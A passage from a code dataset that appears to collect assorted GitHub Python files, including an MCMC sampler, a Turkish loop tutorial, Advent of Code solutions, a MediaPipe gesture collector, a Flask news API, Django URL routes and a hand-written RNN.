wartosci_wlasne(A)\n# print(wynik)\n","repo_name":"kacperski36/MinWiedzy","sub_path":"lab6+/pd.py","file_name":"pd.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72239373361","text":"\nimport numpy as np\n\ndef run_chain_with_energy(E, x0, symmetric_proposal, N, thinning_factor = 1, burn_in = 0):\n \"\"\"\n Will sample N values for the chain starting with x0.\n The energy function is given by E(...) which takes a\n vector similar to x0 as argument.\n\n 'symmetric_proposal' is a function that yields the\n next position proposed. It is assumed to be symmetrical\n because we don't compensate in the ratio.\n \"\"\"\n\n if len(x0.shape) != 1:\n error(\"Wrong dimension for x0. This function is not vectorial.\")\n\n if thinning_factor < 1:\n error(\"You misunderstood the thinning_factor. It should be 1 for no thinning, and 32 if we want one out of every 32 samples.\")\n\n # Same algorithm as below, but running for burn_in.\n # It's a bit of code duplication.\n current_x = x0\n current_E = E(current_x)\n for _ in np.arange(0,burn_in):\n proposed_x = symmetric_proposal(current_x)\n loga = -E(proposed_x) + current_E\n if loga >= 0 or loga >= np.log(np.random.uniform(0,1)):\n current_x = proposed_x\n current_E = E(current_x)\n\n\n d = x0.shape[0]\n samples = np.zeros((N,d))\n # Start from the 'current_x' from the burn_in\n # and not from x0.\n samples[0,:] = current_x\n\n accepted_counter = 0\n rejected_counter = 0\n\n for n in np.arange(0,N-1):\n current_x = samples[n,:]\n # cache the energy to avoid recomputing\n current_E = E(current_x)\n\n for i in np.arange(0,thinning_factor):\n proposed_x = symmetric_proposal(current_x)\n loga = -E(proposed_x) + current_E\n #print \"loga = %f\" % loga\n if loga >= 0 or loga >= np.log(np.random.uniform(0,1)):\n # accepted !\n current_x = proposed_x\n current_E = E(current_x)\n accepted_counter = accepted_counter + 1\n else:\n rejected_counter = rejected_counter + 1\n\n samples[n+1,:] = current_x\n\n return (samples,\n accepted_counter * 1.0 / (accepted_counter + rejected_counter) )\n","repo_name":"gyom/denoising_autoencoder","sub_path":"focus_on_training/metropolis_hastings_sampler.py","file_name":"metropolis_hastings_sampler.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34152457222","text":"# region giris\n# loop\n# loop ne zaman kullanılır?\n# loop → sürekli tekrarlayan işlemlerin yapılmasını sağlayan komutlardır\n\"\"\"\nprint(\"24 saatte kargoda\")\nprint(\"24 saatte kargoda\")\nprint(\"24 saatte kargoda\")\n\n\ni = 0\nwhile i<1000:\n i +=1\n print(\"12 saatte kargoda\")\n\"\"\"\n# endregion\n\n# region aman_dikkat\n\"\"\"\nwhile True:\n print(\"şu an while döngüsü içindeyim\")\n\"\"\"\n# endregion\n\n#region while_yazim_kurallari\n\"\"\"\n1 → BAŞLANGIÇ\n2 → BİTİŞ\n3 → ARTIŞ MİKTARI\n \ni = 0\nprint(\"a\")\nwhile i<=3:\n i +=1\n print(\"b\")\nprint(\"c\")\n\"\"\" \n#endregion\n\n# region dikkat_edilmesi_gereken_kurallar\n\"\"\"\ni = 1\nwhile i<3: # i büyük 3 olduğu sürece DÖN \n print(\"sponsorlu ürün\")\n\"\"\" \n# endregion\n\n# region ornek_1\n\"\"\"\ni = 1\nprint(\"a\")\nwhile i<=3:\n print(\"b\")\n i += 1\nprint(\"c\")\n\"\"\"\n# endregion\n\n# region ornek_2\n\"\"\"\nsayac = 1\nwhile sayac<=5:\n print(sayac)\n sayac += 1\n\"\"\"\n# endregion\n\n# region ornek_3\n\"\"\"\nsayac = 5\nwhile sayac: #yada sayac != 0:\n print(sayac)\n sayac -= 1\n\n\n# def. da siz koşulu int bir tam sayıya bağlı olarak yazarsanız\n# tam sayı 0 olduğunda döngü kırılır\n\"\"\"\n\n\nsayac = 5\ndevamMi = True\nwhile devamMi: \n print(sayac)\n if sayac==2:\n devamMi=False\n sayac -= 1\n\n\n# endregion","repo_name":"azizbektas/VSCode-Ecodation-PC","sub_path":"03_donguler/0301_donguler.py","file_name":"0301_donguler.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"tr","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"35111670870","text":"from pathlib import Path\nimport copy\n\n# Import data\ninput_data = Path('/Kodprojekt/adventofcode/adventofcode2020/input_data')\ninput_file = input_data / 'adventofcode_input_8.txt'\nf = open(input_file, 'r')\ncontent = f.readlines()\n\n# Create list\ninstructions_input = list()\nfor line in content:\n instructions_input.append(line.split())\n\ndef run_instructions(instructions):\n \"\"\"\n Run instruction file\n \"\"\"\n index = 0\n accumulator = 0\n index_visited = list()\n\n while index not in index_visited:\n index_visited.append(index)\n instruction = instructions[index][0]\n argument = int(instructions[index][1])\n\n # Apply instruction\n if instruction == 'nop':\n index += 1\n elif instruction == 'jmp':\n index += argument\n elif instruction == 'acc':\n accumulator += argument\n index += 1\n \n # Check outcome\n if index in index_visited:\n return False, 0\n elif index == len(content):\n return True, accumulator\n\nfor i in range(len(content)):\n instructions_updated = copy.deepcopy(instructions_input)\n instruction = instructions_input[i][0]\n\n # Update instruction\n if instruction == 'nop':\n instructions_updated[i][0] = 'jmp'\n elif instruction == 'jmp':\n instructions_updated[i][0] = 'nop'\n\n # Run\n success, acc_result = run_instructions(instructions_updated)\n\n if success == True:\n print('Row ', i, ' has been changed and completed successfully!')\n print('Accumulator value: ', acc_result)\n exit()\n","repo_name":"erikasegerstrom/adventofcode2020","sub_path":"adventofcode_8_2.py","file_name":"adventofcode_8_2.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18200832542","text":"import cv2\r\nimport mediapipe as mp\r\nimport numpy as np\r\nimport pandas as pd\r\n'''\r\n각도의 의미 학습을 시켜서 활용 가능하다.\r\n\r\n손가락 제스쳐를 활용한 컨트롤러 등\r\n\r\n주먹 stop\r\n\r\n보자기 fire\r\n'''\r\nmax_num_hands = 1\r\ngesture = { 0:'stop' , 1:'fire' }\r\n\r\nmp_hands = mp.solutions.hands\r\nmp_drawing = mp.solutions.drawing_utils\r\ncap = cv2.VideoCapture(0)\r\n\r\ntotal_result = []\r\ndef click(event,x,y,flags,params):\r\n global data\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print('mouse click')\r\n total_result.append(data)\r\n print(data)\r\n\r\ncv2.namedWindow('Dataset')\r\ncv2.setMouseCallback('Dataset',click)\r\n\r\nwith mp_hands.Hands(max_num_hands=max_num_hands, min_detection_confidence=0.5, min_tracking_confidence=0.5) as hands:\r\n while True:\r\n ret,img = cap.read()\r\n\r\n img = cv2.flip(img,1)\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n result = hands.process(img)\r\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\r\n # 관절 벡터 구하기\r\n if result.multi_hand_landmarks is not None:\r\n for res in result.multi_hand_landmarks:\r\n joint = np.zeros((21,3))\r\n for j,lm in enumerate(res.landmark):\r\n joint[j] = [lm.x,lm.y,lm.z]\r\n # 관절 벡터 가져 올 묶음 쌍\r\n v1 = joint[[0,1,2,3,0,5,6,7,0,9,10,11,0,13,14,15,0,17,18,19], :]\r\n v2 = joint[[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20], :]\r\n v = v2 - v1\r\n # 정규화\r\n v = v / np.linalg.norm(v,axis=1)[:,np.newaxis]\r\n\r\n angle = np.arccos( np.einsum('nt,nt->n',\r\n v[[0,1,2,4,5,6,8,9,10,12,13,14,16,17,18],:],\r\n v[[1,2,3,5,6,7,9,10,11,13,14,15,17,18,19],:]\r\n ) )\r\n\r\n angle = np.degrees(angle)\r\n data = np.array([angle],dtype=np.float32)\r\n data = np.append(data, 3)\r\n\r\n mp_drawing.draw_landmarks(img,res,mp_hands.HAND_CONNECTIONS)\r\n\r\n cv2.imshow('Dataset',img)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n'''\r\neinsum 하면 rad 값이 구해짐. \r\n\r\n아니면 각각의 벡터를 하나하나씩 반복문 돌려서 해 주어야 함.\r\n\r\n키를 누를 때마다 학습 데이터 저장하기\r\n'''\r\ntotal_result = np.array(total_result,dtype=np.float32)\r\ndf = pd.DataFrame(total_result)\r\nprint(total_result)\r\ndf.to_csv('hand.csv',mode='a',index=None,header=None)\r\nprint('=========end==============')","repo_name":"joowop/Metaverse_AI_Project","sub_path":"posetest/hand_gesture.py","file_name":"hand_gesture.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27217586111","text":"from flask import Flask, request\nfrom flask_cors import CORS\nfrom history import History\nfrom datetime import datetime\nfrom sentiment import content_score\nfrom statistics import avg_score, most_common_author, most_common_source, read_bias_ratio\nimport json\nimport requests\nimport os\n\nAPP = Flask(__name__)\nCORS(APP)\n\nwith open(\"news.json\") as f:\n news = json.load(f)\n\n@APP.route(\"/\", methods=[\"GET\"])\ndef root():\n \"\"\" default route \"\"\"\n\n return \"

Welcome to Uplift's backend API!

\"\n\n@APP.route('/news', methods=[\"GET\"])\ndef get_news():\n \"\"\" Get general news for a particular topic \"\"\"\n\n search = request.args.get(\"search\")\n response = requests.get(f\"{news['base_url']}/v2/everything?apiKey={news['api_key']}&q={search}\").json()\n article_list = response['articles'][:15]\n for item in article_list:\n item['score'] = content_score(item['title'], item['description'], item['content'])\n \n return {'articles': article_list}\n\n@APP.route('/news/headlines', methods=[\"GET\"])\ndef get_news_headlines():\n \"\"\" Get the top headlines for a particular topic, category and/or country \"\"\"\n\n search = request.args.get(\"search\")\n category = request.args.get(\"category\")\n country = request.args.get(\"country\")\n query_string = \"\"\n \n if search:\n query_string += f\"&q={search}\"\n if category:\n query_string += f\"&category={category}\"\n if country:\n query_string += f\"&country={country}\"\n # print(f\"{query_string=}\")\n response = requests.get(f\"{news['base_url']}/v2/top-headlines?apiKey={news['api_key']}{query_string}\").json()\n article_list = response['articles'][:15]\n for item in article_list:\n item['score'] = content_score(item['title'], item['description'], item['content'])\n \n return {'articles': article_list}\n\n@APP.route('/history/add', methods=[\"POST\"])\ndef history_add():\n \"\"\" \n Add details for an article read by the user with uuid \n \n Parameters:\n - uuid\n - title\n - author\n - description\n - content\n - source\n \"\"\"\n\n history = History(\"database.json\")\n body = request.json\n score = content_score(body['title'], body['description'], body['content'])\n\n now = datetime.now()\n time_added = now.strftime(\"%H:%M:%S\")\n\n return history.add(body[\"uuid\"], body[\"title\"], body[\"source\"], score, body[\"author\"], time_added)\n\n@APP.route('/history', methods=[\"GET\"])\ndef history():\n \"\"\" get a list of articles for all articles already read by the user with uuid \"\"\"\n\n uuid = request.args.get(\"uuid\")\n history = History(\"database.json\")\n return {\n \"history\": history.visited(uuid)\n }\n\n@APP.route('/stats', methods=[\"GET\"])\ndef stats():\n \"\"\" give statistics based on user history \"\"\"\n uuid = request.args.get(\"uuid\")\n\n return {\n \"avg_score\": avg_score(uuid),\n \"most_common_author\": most_common_author(uuid),\n \"most_common_source\": most_common_source(uuid),\n \"bias_ratio\": read_bias_ratio(uuid)\n }\n\n\nif __name__ == \"__main__\":\n APP.run(host=\"0.0.0.0\", debug=True, port=8080)\n","repo_name":"CSESoc-Hackathon-Uplift/Backend","sub_path":"src/server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43792080212","text":"r\"\"\"Parse all the results of Kahle Michalek (in directory ``all-qpoly/``) \nand save the results in json format in a directory ``all-qpoly-json/``.\n\nThis is a script.\n\nTo recover the data in python, for instancxe the data corresponding to the label \"3\", use:\n```\nimport json\n\nwith (\"all-qpoly-json/3.json\") as f:\n res = json.load(f)\n```\n\nThis script should run from within the directory that contains the subdirectories \n``all-qpoly/`` and ``all-qpoly-json/``\nfrom shell with::\n python -m parse_to_json.py\n \nor from within python with::\n execfile('parse_to_json.py')\n\"\"\"\nimport json, os, barvinok_parser\n\nOUTPUT_DIR = \"all-qpoly-json/\"\nINPUT_DIR = \"all-qpoly/\"\n\nwith os.scandir(INPUT_DIR) as input_dir: # os.scandir for python >= 3.5\n for entry in input_dir:\n if entry.name.endswith(\".qpoly\") and entry.is_file():\n output_file = entry.name[:-len(\".qpoly\")] + \".json\"\n print(\"{} -> {}\".format(entry.name, output_file))\n with open(entry.path, 'r') as f:\n data = f.read()\n res = barvinok_parser.parse_function(data)\n with open(os.path.join(OUTPUT_DIR, output_file), 'w') as f:\n json.dump(res, f, indent=4)\n","repo_name":"EmmanuelJeanBriand/qpoly_plethysm","sub_path":"parse_to_json.py","file_name":"parse_to_json.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"8577803931","text":"from django.conf.urls import url\nfrom django.contrib.auth.decorators import login_required\n\nfrom . import views\n\napp_name = 'music'\nurlpatterns = [\n\n # /music/login\n url(r'login/$', views.login_user, name='login'),\n\n # /music/check_login\n url(r'login_check/$', views.login_check, name='login_check'),\n\n # /music\n url(r'^$', views.index, name='index'),\n\n # /music/songs\n url(r'songs/$', views.get_songs, name='songs'),\n\n # /music/register/\n url(r'^register/$', login_required(views.UserFormView.as_view()), name='register'),\n\n # /music//\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n\n # /music/album/add/\n url(r'album/add/$', login_required(views.AlbumCreate.as_view()), name='create'),\n\n # /music/song/add\n url(r'song/add/$', login_required(views.SongCreate.as_view()), name='song_create'),\n\n # /music/album//\n url(r'album/(?P[0-9]+)/$', login_required(views.AlbumUpdate.as_view()), name='album_update'),\n\n # /music/song//\n url(r'song/(?P[0-9]+)/$', login_required(views.SongUpdate.as_view()), name='song_update'),\n\n # /music/album//delete/\n url(r'album/(?P[0-9]+)/delete/$', login_required(views.AlbumDelete.as_view()), name='delete'),\n\n # /music/logout\n url(r'logout/$', views.logout_user, name='logout'),\n\n # /music//favourite/\n # url(r'^(?P[0-9]+)/favourite/$', views.favourite, name='favourite'),\n]\n","repo_name":"PrajwalRavi/Musik","sub_path":"music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10621192644","text":"#%%\nimport sys\ninput = sys.stdin.readline\n\n#%%\nclass Stack:\n def __init__(self):\n self.stack = []\n self.func_list = {\n 'push': Stack.push,\n 'pop': Stack.pop,\n 'size': Stack.size,\n 'empty': Stack.empty,\n 'top': Stack.top,\n }\n\n def push(self, n):\n n = int(n)\n self.stack.append(n)\n\n def pop(self):\n try:\n print(self.stack.pop())\n except:\n print(-1)\n\n def size(self):\n print(len(self.stack))\n\n def empty(self):\n if not self.stack:\n print(1)\n else:\n print(0)\n\n def top(self):\n try:\n print(self.stack[-1])\n except:\n print(-1)\n\n def str_to_func(self, string):\n func_name, *arg = string.split()\n self.func_list[func_name](self,*arg)\n\n#%%\nstack = Stack()\nfor i in range(int(input())):\n stack.str_to_func(input())\n# %%\n# stack.push1(3)\n# stack.str_to_func('push 1')\n# stack.str_to_func('top')\n# print(stack.stack)","repo_name":"JungYongHui/Coding-Test","sub_path":"JH/10828_스택/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6460456663","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Rnn:\r\n # constructor: instance value for Rnn instance\r\n def __init__(self):\r\n # constant value--dimension\r\n self.m = 1 # dimension of output vector\r\n self.n = 30 # dimension of vector of hidden state\r\n self.p = 1 # dimension of input vector\r\n self.step = 10 # maximum length of sequence\r\n self.batch_size = 32\r\n self.pre_step = 1 # maximum length of prediction sequence\r\n self.initial = 1.52\r\n # other value--parameter matrix\r\n self.v = np.random.uniform(-self.initial, self.initial, (self.m, self.n)) #\r\n self.w = np.random.uniform(-self.initial/self.n, self.initial/self.n, (self.n, self.n)) #\r\n self.u = np.random.uniform(-self.initial, self.initial, (self.n, self.p)) #\r\n self.rnn_cells = [Rnn.RnnCell(self)] # Rnn cell array of Rnn instance\r\n self.losses = np.empty(0) # loss of each prediction of Rnn instance\r\n self.input_mat = np.zeros((0, 0)) # matrix containing input vectors\r\n self.output_mat = np.zeros((0, 0)) # matrix containing output vectors\r\n self.input_length = 0 #\r\n self.output_length = 0 # defined by user\r\n self.output_start = 0 # defined by user, default 1\r\n self.train_time = 3000 #\r\n self.learning_rate = 0.001 #\r\n\r\n class RnnCell:\r\n def __init__(self, rnn_obj):\r\n self.ot = np.zeros((rnn_obj.m, 1)) # output vector\r\n self.st = np.zeros((rnn_obj.n, 1)) # hidden vector\r\n self.xt = np.zeros((rnn_obj.p, 1)) # input vector\r\n self.yt = self.ot # actual result\r\n self.ot0 = self.ot # output vector before softmax activation\r\n self.st0 = self.st # hidden vector before sigmoid activation\r\n self.lt_partial_u = np.zeros_like(rnn_obj.u) # contribution to gradient of u\r\n self.lt_partial_w = np.zeros_like(rnn_obj.w) # contribution to gradient of w\r\n self.lt_partial_v = np.zeros_like(rnn_obj.v) # contribution to gradient of v\r\n self.st0_partial_u = np.zeros((rnn_obj.n, rnn_obj.n * rnn_obj.p)) # iteration\r\n self.st0_partial_w = np.zeros((rnn_obj.n, rnn_obj.n * rnn_obj.n)) # iteration\r\n\r\n # calculation method for RnnCell\r\n def cross_entropy_loss(self):\r\n return\r\n\r\n def mse_loss(self): # input is a vector, return is a vector\r\n return np.sum((self.ot - self.yt) ** 2)\r\n\r\n def partial_mse(self): # input is a vector, return is a vector\r\n return 2*(self.ot-self.yt)\r\n\r\n def sigmoid(self): # input is a vector, return is a vector\r\n return np.ones_like(self.st0) / (np.ones_like(self.st0) + np.exp(-self.st0))\r\n\r\n def partial_sigmoid(self): # input is a vector, return is a vector\r\n return self.st * (np.ones_like(self.st) - self.st)\r\n\r\n def tanh(self):\r\n return (np.exp(self.st0) - np.exp(-self.st0)) / (np.exp(self.st0) + np.exp(-self.st0))\r\n\r\n def partial_tanh(self):\r\n return np.ones_like(self.st) - self.st ** 2\r\n\r\n def softmax(self): # input is a vector, return is a vector\r\n # x=x-np.max(x) # compute in a stable way # hard to differentiate\r\n return np.exp(self.ot0) / np.sum(np.exp(self.ot0))\r\n\r\n def partial_softmax(self): # input is a vector, return is a matrix\r\n return np.diag(self.ot) - self.ot @ self.ot.transpose()\r\n\r\n # training method for Rnn instance\r\n def get_data(self, data):\r\n self.input_mat = np.reshape(data, (self.p, np.size(data)))\r\n return np.size(data)\r\n\r\n def forward_propagate(self):\r\n for i in np.arange(1, self.batch_size+1, 1):\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n\r\n # rnn_cell[self.step] need to be specially tackled\r\n self.rnn_cells[self.batch_size].ot0 = self.v @ self.rnn_cells[self.batch_size].st\r\n self.rnn_cells[self.batch_size].ot = self.rnn_cells[self.batch_size].ot0\r\n lose = self.rnn_cells[self.batch_size].mse_loss()\r\n\r\n for i in np.arange(self.batch_size+1, self.batch_size+self.pre_step, 1):\r\n self.rnn_cells[i].xt = self.rnn_cells[i-1].ot\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n self.rnn_cells[i].ot0 = self.v @ self.rnn_cells[i].st\r\n self.rnn_cells[i].ot = self.rnn_cells[i].ot0 # no activation in output layer\r\n lose = lose + self.rnn_cells[i].mse_loss()\r\n return lose\r\n\r\n def back_propagate(self):\r\n du = np.zeros_like(self.u) # initialize du, dw, dv\r\n dw = np.zeros_like(self.w)\r\n dv = np.zeros_like(self.v)\r\n for i in np.arange(self.batch_size-self.step, self.batch_size+self.pre_step, 1):\r\n lt_partial_ot = self.rnn_cells[i].partial_mse()\r\n lt_partial_st0 = (self.v.transpose() @ lt_partial_ot) * self.rnn_cells[i].partial_tanh()\r\n self.rnn_cells[i].st0_partial_u = \\\r\n np.kron(np.eye(self.n), self.rnn_cells[i].xt.transpose()) + self.w @ \\\r\n (np.kron(np.ones((1, self.n * self.p)), self.rnn_cells[i].partial_tanh()) *\r\n self.rnn_cells[i-1].st0_partial_u)\r\n self.rnn_cells[i].st0_partial_w = \\\r\n np.kron(np.eye(self.n), self.rnn_cells[i-1].st.transpose()) + self.w @ \\\r\n (np.kron(np.ones((1, self.n * self.n)), self.rnn_cells[i-1].partial_tanh()) *\r\n self.rnn_cells[i-1].st0_partial_w)\r\n self.rnn_cells[i].lt_partial_u = np.reshape(lt_partial_st0.transpose() @ self.rnn_cells[i].st0_partial_u,\r\n (self.n, self.p))\r\n self.rnn_cells[i].lt_partial_w = np.reshape(lt_partial_st0.transpose() @ self.rnn_cells[i].st0_partial_w,\r\n (self.n, self.n))\r\n self.rnn_cells[i].lt_partial_v = lt_partial_ot @ self.rnn_cells[i].st.transpose()\r\n du = du + self.rnn_cells[i].lt_partial_u\r\n dw = dw + self.rnn_cells[i].lt_partial_w\r\n dv = dv + self.rnn_cells[i].lt_partial_v\r\n\r\n self.u = self.u - self.learning_rate * self.rnn_cells[self.batch_size].lt_partial_u\r\n self.w = self.w - self.learning_rate * self.rnn_cells[self.batch_size].lt_partial_w\r\n self.v = self.v - self.learning_rate * self.rnn_cells[self.batch_size].lt_partial_v\r\n return\r\n\r\n def train(self, data):\r\n # process input data and initialize array of Rnn cells as well as array of losses\r\n self.input_length = self.get_data(data)\r\n self.losses = np.empty(self.train_time)\r\n\r\n # self.train_time is times of training\r\n # in each time of training, randomly choose a batch of self.step samples\r\n # create an array of self.step Rnn cells\r\n # forward propagate and back_propagate respectively\r\n for i in np.arange(0, self.train_time, 1):\r\n self.rnn_cells = [Rnn.RnnCell(self)] * (self.batch_size+self.pre_step) # create an array of Rnn cell\r\n begin = np.random.randint(1, self.input_length-self.batch_size-self.pre_step+1) # start of training step\r\n\r\n print(i, \": begin: \", begin)\r\n\r\n for j in np.arange(begin, begin+self.batch_size, 1): # initialize input for training network\r\n self.rnn_cells[j-begin+1].xt = np.reshape(self.input_mat[:, j-1], (self.p, 1))\r\n for j in np.arange(begin, begin+self.batch_size+self.pre_step-1, 1):\r\n self.rnn_cells[j-begin+1].yt = np.reshape(self.input_mat[:, j], (self.p, 1))\r\n self.losses[i] = self.forward_propagate()\r\n self.back_propagate()\r\n return\r\n\r\n # predicting method for Rnn instance\r\n def predict(self, output_start, output_length):\r\n self.output_start = output_start\r\n self.output_length = output_length\r\n if self.output_start > self.input_length:\r\n Exception(\"Start of prediction > input_length!\")\r\n return\r\n self.output_mat = np.zeros((self.m, self.output_length))\r\n self.rnn_cells = [Rnn.RnnCell(self)] * (self.output_start+self.output_length)\r\n for i in np.arange(1, self.output_start+1, 1): # initialize input for training network\r\n self.rnn_cells[i].xt = np.reshape(self.input_mat[:, i-1], (self.p, 1))\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n\r\n # if i==2:\r\n # print(self.u, \"\\n\")\r\n # print(self.w, \"\\n\")\r\n # print(self.rnn_cells[i].xt, \"\\n\")\r\n # print(self.rnn_cells[i].st0)\r\n\r\n self.rnn_cells[self.output_start].ot0 = self.v @ self.rnn_cells[self.output_start].st\r\n self.rnn_cells[self.output_start].ot = self.rnn_cells[self.output_start].ot0\r\n self.output_mat[:, 0] = np.reshape(self.rnn_cells[self.output_start].ot, self.m)\r\n\r\n # print(self.rnn_cells[self.output_start].st)\r\n # print(self.rnn_cells[self.output_start].ot)\r\n\r\n for i in np.arange(self.output_start+1, self.output_start+self.output_length, 1):\r\n self.rnn_cells[i].xt = self.rnn_cells[i-1].ot\r\n\r\n # print(self.rnn_cells[i].st)\r\n\r\n self.rnn_cells[i].st0 = self.u @ self.rnn_cells[i].xt + self.w @ self.rnn_cells[i-1].st\r\n self.rnn_cells[i].st = self.rnn_cells[i].tanh()\r\n self.rnn_cells[i].ot0 = self.v @ self.rnn_cells[i].st\r\n self.rnn_cells[i].ot = self.rnn_cells[i].ot0\r\n\r\n # print(self.rnn_cells[i].ot)\r\n\r\n self.output_mat[:, i-self.output_start] = np.reshape(self.rnn_cells[i].ot, self.m)\r\n return self.output_mat\r\n\r\n\r\nif __name__ == '__main__':\r\n sin_data = np.sin(np.arange(0, 101, 0.8))\r\n cos_data = np.cos(np.arange(0, 101, 1))\r\n pow_data = np.arange(0, 101, 1) ** 2\r\n line_data = np.arange(0, 101, 1)\r\n pow_3_4_data = np.arange(0, 101, 1) ** 0.75\r\n sqrt_data = np.sqrt(np.arange(0, 101, 1))\r\n log_data = np.log(np.arange(1, 102, 1))\r\n con_data = np.ones(101)\r\n # dec_data = np.exp(-np.ones_like(np.arange(0, 101, 1))) * sin_data\r\n rnn = Rnn()\r\n rnn.train(line_data)\r\n # plt.plot(np.arange(0, np.size(sin_data), 1), sin_data)\r\n # fig1 = plt.plot(np.arange(0, np.size(rnn.losses), 1), rnn.losses)\r\n # print(rnn.u)\r\n # print(rnn.w)\r\n # print(rnn.v)\r\n # plt.show()\r\n output = np.reshape(rnn.predict(100, 3), 3)\r\n fig2 = plt.plot(np.arange(0, np.size(output), 1), output)\r\n print(np.sin(100))\r\n plt.show()\r\n pass\r\n","repo_name":"SunnyXia3579/Self-Made-RNN-GRU","sub_path":"RNN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22917809336","text":"import time\nimport os\n\n\nclass Move:\n Rock = 1\n Paper = 2\n Scissors = 3\n\n Win = 6\n Loss = 0\n Draw = 3\n\n\nclass Round:\n def __init__(self, move1, move2, desired_result):\n self.p1_move = move1\n self.p2_move = move2\n if desired_result == Move.Draw:\n self.p2_move_pt2 = move1\n elif move1 == Move.Rock:\n self.p2_move_pt2 = Move.Paper if desired_result == Move.Win else Move.Scissors\n elif move1 == Move.Scissors:\n self.p2_move_pt2 = Move.Rock if desired_result == Move.Win else Move.Paper\n elif move1 == Move.Paper:\n self.p2_move_pt2 = Move.Scissors if desired_result == Move.Win else Move.Rock\n\n def get_round_score(self) -> (int, int):\n if self.p1_move == self.p2_move:\n return Move.Draw + self.p1_move, Move.Draw + self.p2_move\n\n winner = None\n # Ignore which player made the move in determining the winner to do less checks...\n moves = sorted([self.p1_move, self.p2_move])\n if moves[0] == Move.Rock and moves[1] == Move.Scissors:\n winner = 0\n elif moves[0] == Move.Rock and moves[1] == Move.Paper:\n winner = 1\n elif moves[0] == Move.Paper and moves[1] == Move.Scissors:\n winner = 1\n\n # Then correct for it if it's the opposite configuration\n if moves[0] != self.p1_move:\n moves.reverse()\n winner += 1\n winner %= 2\n\n return self.p1_move + (Move.Win if winner == 0 else Move.Loss), \\\n self.p2_move + (Move.Win if winner == 1 else Move.Loss)\n\n\ndef parse_input(filename: str):\n # I know r is the default but for some reason I just always explicitly specify it.\n rounds = []\n with open(filename, \"r\") as file:\n for line in file:\n line = line.strip().split(\" \")\n assert len(line) == 2, \"Good input should have 2 things per line\"\n STUFF = {\"A\": Move.Rock, \"X\": Move.Rock,\n \"B\": Move.Paper, \"Y\": Move.Paper,\n \"C\": Move.Scissors, \"Z\": Move.Scissors}\n STUFF2 = {\"X\": Move.Loss, \"Y\": Move.Draw, \"Z\": Move.Win}\n rounds.append(Round(STUFF[line[0]], STUFF[line[1]], STUFF2[line[1]]))\n\n return rounds\n\n\ndef main(input_filename: str):\n start_time = time.time()\n moves = parse_input(input_filename)\n\n part1_start = time.time()\n p1_score = 0\n p2_score = 0\n for move in moves:\n dp1, dp2 = move.get_round_score()\n p1_score += dp1\n p2_score += dp2\n\n part2_start = time.time()\n p1_score_pt2 = 0\n p2_score_pt2 = 0\n for move in moves:\n move.p2_move = move.p2_move_pt2\n dp1, dp2 = move.get_round_score()\n p1_score_pt2 += dp1\n p2_score_pt2 += dp2\n\n end_time = time.time()\n print(f\"Part 1: You scored {p2_score} points!\")\n print(f\" This {'beats' if p2_score > p1_score else 'does not beat'} the elf's {p1_score} points.\")\n print(f\"Part 2: You scored {p2_score_pt2} points!\")\n print(f\" This {'beats' if p2_score_pt2 > p1_score_pt2 else 'does not beat'} the elf's {p1_score_pt2} points.\")\n print(\"Elapsed Time:\")\n print(f\" Parsing: {(part1_start - start_time) * 1000:.2f} ms\")\n print(f\" Part 1: {(part2_start - part1_start) * 1000:.2f} ms\")\n print(f\" Part 2: {(end_time - part2_start) * 1000:.2f} ms\")\n print(f\" Total: {(end_time - start_time) * 1000:.2f} ms\")\n\n\nif __name__ == \"__main__\":\n def run_main():\n os.chdir(os.path.split(__file__)[0])\n main(\"../../inputs/2022/day02.txt\")\n\n\n run_main()\n","repo_name":"Dullstar/Advent_Of_Code","sub_path":"python/year2022/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5431171202","text":"# Time: O(n)\n# Space: O(n)\n\n# Given an array of integers, return indices of the two numbers\n# such that they add up to a specific target.\n#\n# You may assume that each input would have exactly one solution.\n#\n# Example:\n# Given nums = [2, 7, 11, 15], target = 9,\n#\n# Because nums[0] + nums[1] = 2 + 7 = 9,\n# return [0, 